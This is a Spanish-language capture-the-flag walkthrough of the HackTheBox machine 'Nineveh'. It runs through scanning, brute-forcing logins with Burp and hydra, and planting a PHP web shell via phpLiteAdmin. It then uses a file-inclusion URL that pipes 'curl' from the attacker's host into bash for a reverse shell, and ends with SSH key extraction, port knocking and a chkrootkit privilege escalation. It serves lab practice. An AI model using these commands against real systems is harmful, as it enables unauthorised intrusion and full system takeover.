echo "10.129.199.42 nineveh.htb" | sudo tee -a /etc/hosts

nmap -p- --open -T5 -v -n 10.129.199.42

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.199.42 -oG allPorts

Pasted image 20210816133925.png

nmap -sCV -p80,443 10.129.199.42 -oN targeted

Pasted image 20210816133853.png

whatweb http://10.129.199.42

Pasted image 20210816134048.png

Pasted image 20210816134405.png

wfuzz -c -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.199.42/FUZZ

Pasted image 20210816134831.png

Pasted image 20210816135108.png

wfuzz -c -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt https://10.129.199.42/FUZZ

Pasted image 20210816135332.png

Abrimos burpsuite y usamos intruder para hacer un ataque en el formulario de login

Pasted image 20210816135536.png

Modificamos el Target scope para que sea el url de nineveh http://10.129.199.42

Pasted image 20210816135628.png

Lo configuramos para hacer un ataque llamado sniper. El payload se usaria en el texto que esta entre $.

Pasted image 20210816140002.png

head -n 10000 /usr/share/wordlists/rockyou.txt > password.txt

Adquirimos las primeras 1000 palabras de rockyou.txt y lo ponemos en un archivo password.txt

Pasted image 20210816140127.png

Subimos el archivo de password.txt para usarlo como payload. Y quitamos el URL-encode these characters.

Pasted image 20210816140259.png

En esta parte para el Grep-Extract hacemos una columna de invalid password para que nos demos cuenta si la palabra es valida.

Pasted image 20210816141004.png

Encontramos las credenciales admin:1q2w3e4r5t

Pasted image 20210816142305.png

Entramos a la pagina y vemos opciones como Home, Notes y Logout.

Pasted image 20210816142923.png

Podemos ver que https://nineveh.htb/db/ tiene un phpLiteAdmin

Pasted image 20210816143057.png

hydra 10.129.199.42 https-form-post "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -l admin -P /usr/share/wordlists/rockyou.txt

Pasted image 20210816143931.png

Usamos burpsuite para poder cambiar la contrasena. Usamos las credenciales password123.

Creamos una base datos nueva. Y le agregamos una tabla tambien.

Se elige la opcion de TEXT y se pone esto en la primera columna:

<?php system($_REQUEST["cmd"]) ?>

Pasted image 20210816145423.png

Creamos una pagina index.html que tiene un reverse shell a la maquina kali de bash.

python3 -m http.server 80

nc -lvnp 443

Pasted image 20210816151221.png

http://10.10.10.43/department/manage.php?notes/ninevehNotes/../var/tmp/test.php&cmd=curl 10.10.14.110|bash

Pasted image 20210816153216.png

Antes de seguir adelante vemos la siguiente pagina:

http://nineveh.htb/secure_notes

Y bajamos el png.

Pasted image 20210816153749.png

file nineveh.png

exiftool nineveh.png

strings nineveh.png

Vemos que tiene un rsa key.

Pasted image 20210816154845.png

creamos un id_rsa

Pasted image 20210816155424.png

Como no funciona vim muy bien en la consola. Copie la llave desde kali a la maquina.

python3 -m http.server 80

cd tmp

wget http://10.10.14.110/id_rsa

chmod 600 id_rsa

ssh -i id_rsa amrois@localhost

Pasted image 20210816155725.png

El puerto 22 no esta abierto

Pasted image 20210816160014.png

knock 10.129.199.42 571:tcp 290:tcp 911:tcp

nmap -p22 10.129.199.42 --open -T5 -v -n

Pasted image 20210816161547.png

Bajamos pspy. https://github.com/DominicBreuker/pspy

go build -ldflags "-s -w" main.go

Pasted image 20210816161736.png

du -hc main

mv main pspy

Pasted image 20210816161900.png

Subimos el archivo a la maquina.

python3 -m http.server 80

wget http://10.10.14.110/pspy

chmod +x pspy

./pspy

Vemos el servicio chkrootkit.

Pasted image 20210816162026.png

cd tmp

vim update

Creamos un script que se puede ver en la imagen despues del cat update.

chmod +x update

watch -n 1 ls -l /bin/bash

Pasted image 20210816162504.png

Pasted image 20210816162559.png

Vemos que ahora tiene una s en los permisos

Pasted image 20210816162719.png

bash -p

boxes

copyright©2022 Cu3rv0x all rights reserved